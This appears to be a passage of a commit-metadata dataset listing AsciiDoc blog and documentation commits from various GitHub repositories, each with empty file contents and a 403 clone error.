2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae816dbc6eff341bee117b15a929bcce0f5b93dd","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"145f4fe4b8a5d958995b9d26df08edb800d05a2d","subject":"Update 2016-09-26-Hello-World.adoc","message":"Update 2016-09-26-Hello-World.adoc","repos":"mozillahonduras\/mozillahonduras.github.io,mozillahonduras\/mozillahonduras.github.io,mozillahonduras\/mozillahonduras.github.io,mozillahonduras\/mozillahonduras.github.io","old_file":"_posts\/2016-09-26-Hello-World.adoc","new_file":"_posts\/2016-09-26-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mozillahonduras\/mozillahonduras.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7059a01c8aad50e6b0e90529c86be2853e7e3cf8","subject":"Update 2015-04-05-Beat-yourself.adoc","message":"Update 2015-04-05-Beat-yourself.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-04-05-Beat-yourself.adoc","new_file":"_posts\/2015-04-05-Beat-yourself.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4b7d876637bc5b1c3851500cb382cc34ae325fe","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6340441b9a30f3d8ae36f78c6c371d02c3eef05f","subject":"y2b create post The LEGO Laptop!","message":"y2b create post The LEGO Laptop!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-21-The-LEGO-Laptop.adoc","new_file":"_posts\/2016-07-21-The-LEGO-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cd3a91603742d4ed11c8410ad4db87c0944b4e4","subject":"Update 2016-12-01-Exploit-sur-Tor.adoc","message":"Update 2016-12-01-Exploit-sur-Tor.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Exploit-sur-Tor.adoc","new_file":"_posts\/2016-12-01-Exploit-sur-Tor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dadc31b09b8de90cf0817048df3d271796555750","subject":"#169: added README for context","message":"#169: added README for context\n","repos":"m-m-m\/util,m-m-m\/util","old_file":"context\/README.adoc","new_file":"context\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/util.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3cf61ba5a2c5a6584db615fb5b5ae3b7ff6cfc71","subject":"added ADR for the JUnit test engine","message":"added ADR for the JUnit test engine\n\n","repos":"Drakojin\/livingdoc2,bitterblue\/livingdoc2,testIT-LivingDoc\/livingdoc2,LivingDoc\/livingdoc,pkleimann\/livingdoc,Drakojin\/livingdoc2,pkleimann\/livingdoc2,LivingDoc\/livingdoc,LivingDoc\/livingdoc,testIT-LivingDoc\/livingdoc2,bitterblue\/livingdoc2,bitterblue\/livingdoc2,pkleimann\/livingdoc,pkleimann\/livingdoc,Drakojin\/livingdoc2,pkleimann\/livingdoc2","old_file":"doc\/decisions\/adr-004-implement-junit5-engine.adoc","new_file":"doc\/decisions\/adr-004-implement-junit5-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitterblue\/livingdoc2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d7e4a493554037559bbee48a71a97c14ec793dda","subject":"[Docs] Add link to es-kotlin-wrapper-client (#32618)","message":"[Docs] Add link to es-kotlin-wrapper-client (#32618)\n\nES Kotlin Wrapper client is a library that wraps the official Highlevel Elasticsearch HTTP client for Java.\r\n","repos":"HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/community-clients\/index.asciidoc","new_file":"docs\/community-clients\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59e4a15326a4013aaad6ea6d1a1423c8afcbc6b6","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/01\/14\/deref.adoc","new_file":"content\/news\/2022\/01\/14\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"56f0ec6a8185919dfe6b6d63a163f4e3dcce0242","subject":"Update 2016-07-24-OSX-cache-clean.adoc","message":"Update 2016-07-24-OSX-cache-clean.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c6fca303606c9f55c04f79d9b25d34706f5905b","subject":"Update 2017-11-04-Richard-Bellman.adoc","message":"Update 2017-11-04-Richard-Bellman.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-11-04-Richard-Bellman.adoc","new_file":"_posts\/2017-11-04-Richard-Bellman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3277fe3f9990a10faae08a218db7ec6d6577a8dc","subject":"docs: Add Gerrit HTTP endpoint instructions","message":"docs: Add Gerrit HTTP endpoint instructions\n\nSome users cannot use SSH to connect to Gerrit. We should provide\nexplicit instructions for these users on how to submit a patch via\nGerrit so they don't have to figure it out themselves from the Gerrit\ndocs.\n\nChange-Id: I70eb2abf6d4c11500d50be27e398bdf0cb3f85c2\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12218\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9166462bcb570f84bb3fd6704a4289bf1823e98e","subject":"Update 2015-02-29-Ideen-fur-Posts.adoc","message":"Update 2015-02-29-Ideen-fur-Posts.adoc","repos":"nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io","old_file":"_posts\/2015-02-29-Ideen-fur-Posts.adoc","new_file":"_posts\/2015-02-29-Ideen-fur-Posts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nobodysplace\/nobodysplace.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37a0c763cefa763837a52f1ed3839c066c327e7d","subject":"[DOCS] Adds placeholder for Go client documentation (#39379)","message":"[DOCS] Adds placeholder for Go client documentation (#39379)\n\n","repos":"coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/go\/index.asciidoc","new_file":"docs\/go\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9294feae977f4fae3b3603d26404f082f8ecfa41","subject":"[WIP] Add docs for Cassandra connector","message":"[WIP] Add docs for Cassandra connector\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"docs\/connectors\/cassandra.asciidoc","new_file":"docs\/connectors\/cassandra.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7906e6d4b46eb9e686c2757f798dc13d5144128c","subject":"Update 2015-02-10-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","message":"Update 2015-02-10-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2015-02-10-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","new_file":"_posts\/2015-02-10-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3c4e6d98450a4d3e5757f63787ee86fc5aff413","subject":"Update 2017-01-15-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc","message":"Update 2017-01-15-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-01-15-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc","new_file":"_posts\/2017-01-15-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c9092e97b2aad225fa3aeb9a5394be3ae922eab","subject":"y2b create post You've Never Seen Bananas Do This...","message":"y2b create post You've Never Seen Bananas Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-25-Youve-Never-Seen-Bananas-Do-This.adoc","new_file":"_posts\/2017-02-25-Youve-Never-Seen-Bananas-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbfac1d32442c5a067fe8bd1413b5976895d0a54","subject":"Update 2016-06-22-Test-Blog.adoc","message":"Update 2016-06-22-Test-Blog.adoc","repos":"arabindamoni\/hubpress.io,arabindamoni\/hubpress.io,arabindamoni\/hubpress.io,arabindamoni\/hubpress.io","old_file":"_posts\/2016-06-22-Test-Blog.adoc","new_file":"_posts\/2016-06-22-Test-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arabindamoni\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f8684b3661d5db7bbca2e35ea07c70b647f5a2d","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdc1743a0e78449c84fcfbdb84dd0d4adce277fe","subject":"Update 2018-08-25-Laravel56.adoc","message":"Update 2018-08-25-Laravel56.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56.adoc","new_file":"_posts\/2018-08-25-Laravel56.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ee1525055f369d9748da1860230b52346d9e45e","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52f2194544ce26f3787c6f32bfcd709522108b56","subject":"Update 2015-09-15-HubPressASCiiDOC.adoc","message":"Update 2015-09-15-HubPressASCiiDOC.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-15-HubPressASCiiDOC.adoc","new_file":"_posts\/2015-09-15-HubPressASCiiDOC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7e57b753aee3595edc4ca8c05d00d05a71626d6","subject":"Update 2016-02-25-list-questions-c.adoc","message":"Update 2016-02-25-list-questions-c.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-02-25-list-questions-c.adoc","new_file":"_posts\/2016-02-25-list-questions-c.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddae5a31426c7df011ac0055236e2caf7df8e525","subject":"Update 2017-10-28-.adoc","message":"Update 2017-10-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-28-.adoc","new_file":"_posts\/2017-10-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79b46cf7ee9a194ee617afadcc9cce98aeac16c2","subject":"Initial draft of internal TLS design","message":"Initial draft of internal TLS design\n","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design\/internal-tls.adoc","new_file":"documentation\/design\/internal-tls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b072d7b148392012643e1fec727117f9115f777","subject":"Update 2017-08-12-Capture-Outgoing-httphttps-Request-from-web-Application-hosted-on-Azure-App-Service.adoc","message":"Update 2017-08-12-Capture-Outgoing-httphttps-Request-from-web-Application-hosted-on-Azure-App-Service.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-08-12-Capture-Outgoing-httphttps-Request-from-web-Application-hosted-on-Azure-App-Service.adoc","new_file":"_posts\/2017-08-12-Capture-Outgoing-httphttps-Request-from-web-Application-hosted-on-Azure-App-Service.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9781bd069e3cc8f0f432fdbf717bf46d6ae01f0","subject":"Fix broken regex in doc tests","message":"Fix broken regex in doc tests\n\nRegexes are hard.\n","repos":"qwerty4030\/elasticsearch,a2lin\/elasticsearch,rlugojr\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MisterAndersen\/elasticsearch,liweinan0423\/elasticsearch,JackyMai\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,LewayneNaidoo\/elasticsearch,mikemccand\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,MaineC\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rlugojr\/elasticsearch,pozhidaevak\/elasticsearch,JervyShi\/elasticsearch,JackyMai\/elasticsearch,IanvsPoplicola\/elasticsearch,jprante\/elasticsearch,gmarz\/elasticsearch,Shepard1212\/elasticsearch,LewayneNaidoo\/elasticsearch,henakamaMSFT\/elasticsearch,wenpos\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,nezirus\/elasticsearch,winstonewert\/elasticsearch,maddin2016\/elasticsearch,LewayneNaidoo\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,fforbeck\/elasticsearch,jprante\/elasticsearch,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,bawse\/elasticsearch,LeoYao\/elasticsearch,yanjunh\/elasticsearch,C-Bish\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,fernandozhu\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,jimczi\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,a2lin\/elasticsearch,wuranbo\/elasticsearch,glefloch\/elasticsearch,liweinan0423\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,yanjunh\/elasticsearch,fernandozhu\/elasticsearch,brandonkearby\/elasticsearch,JSCooke\/elasticsearch,alexshadow007\/elasticsearch,nilabhsagar\/elasticsearch,artnowo\/elasticsearch,masaruh\/elasticsearch,vroyer\/elassandra,s1monw\/elasticsearch,JackyMai\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,bawse\/elasticsearch,gingerwizard\/elasticsearch,spiegela\/elasticsearch,geidies\/elasticsearch,Stacey-Gammon\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,JackyMai\/elasticsearch,spiegela\/elasticsearch,winstonewert\/elasticsearch,fforbeck\/elasticsearch,a2lin\/elasticsearch,vroyer\/elasticassandra,maddin2016\/elasticsearch,markwalkom\/elasticsearch,liweinan0423\/elasticsearch,LewayneNaidoo\/elasticsearch,C-Bish\/elasticsearch,naveenhooda2000\/elasticsearch,mortonsykes\/elasticsearch,vroyer\/elassandra,lks21c\/elasticsearch,jprante\/elasticsearch,geidies\/elasticsearch,lks21c\/elasticsearch,winstonewert\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,bawse\/elasticsearch,glefloch\/elasticsearch,gmarz\/elasticsearch,markwalkom\/elasticsearch,nazarewk\/elasticsearch,Helen-Zhao\/elasticsearch,mikemccand\/elasticsearch,rlugojr\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,JervyShi\/elasticsearch,qwerty4030\/elasticsearch,i-am-Nathan\/elasticsearch,coding0011\/elasticsearch,liweinan0423\/elasticsearch,HonzaKral\/elasticsearch,nilabhsagar\/elasticsearch,Shepard1212\/elasticsearch,scorpionvicky\/elasticsearch,gmarz\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,njlawton\/elasticsearch,mortonsykes\/elasticsearch,MaineC\/elasticsearch,wuranbo\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,nezirus\/elasticsearch,MisterAndersen\/elasticsearch,brandonkearby\/elasticsearch,alexshadow007\/elasticsearch,jimczi\/elasticsearch,robin13\/elasticsearch,StefanGor\/elasticsearch,njlawton\/elasticsearch,nezirus\/elasticsearch,gmarz\/elasticsearch,strapdata\/elassandra,MaineC\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,yanjunh\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,JackyMai\/elasticsearch,MaineC\/elasticsearch,geidies\/elasticsearch,wenpos\/elasticsearch,scottsom\/elasticsearch,uschindler\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,fernandozhu\/elasticsearch,LewayneNaidoo\/elasticsearch,elasticdog\/elasticsearch,brandonkearby\/elasticsearch,pozhidaevak\/elasticsearch,wangtuo\/elasticsearch,C-Bish\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,obourgain\/elasticsearch,nilabhsagar\/elasticsearch,fernandozhu\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,mohit\/elasticsearch,GlenRSmith\/elasticsearch,mohit\/elasticsearch,IanvsPoplicola\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,StefanGor\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,fforbeck\/elasticsearch,Shepard1212\/elasticsearch,nazarewk\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,mikemccand\/elasticsearch,spiegela\/elasticsearch,mortonsykes\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,sneivandt\/elasticsearch,MaineC\/elasticsearch,JervyShi\/elasticsearch,coding0011\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,mortonsykes\/elasticsearch,LeoYao\/elasticsearch,markwalkom\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,ZTE-PaaS\/elasticsearch,geidies\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,HonzaKral\/elasticsearch,JervyShi\/elasticsearch,fred84\/elasticsearch,artnowo\/elasticsearch,StefanGor\/elasticsearch,bawse\/elasticsearch,glefloch\/elasticsearch,C-Bish\/elasticsearch,njlawton\/elasticsearch,jimczi\/elasticsearch,fforbeck\/elasticsearch,obourgain\/elasticsearch,henakamaMSFT\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,gingerwizard\/elasticsearch,henakamaMSFT\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elasticassandra,ZTE-PaaS\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,obourgain\/elasticsearch,glefloch\/elasticsearch,gfyoung\/elasticsearch,winstonewert\/elasticsearch,lks21c\/elasticsearch,a2lin\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,pozhidaevak\/elasticsearch,fred84\/elasticsearch,obourgain\/elasticsearch,Shepard1212\/elas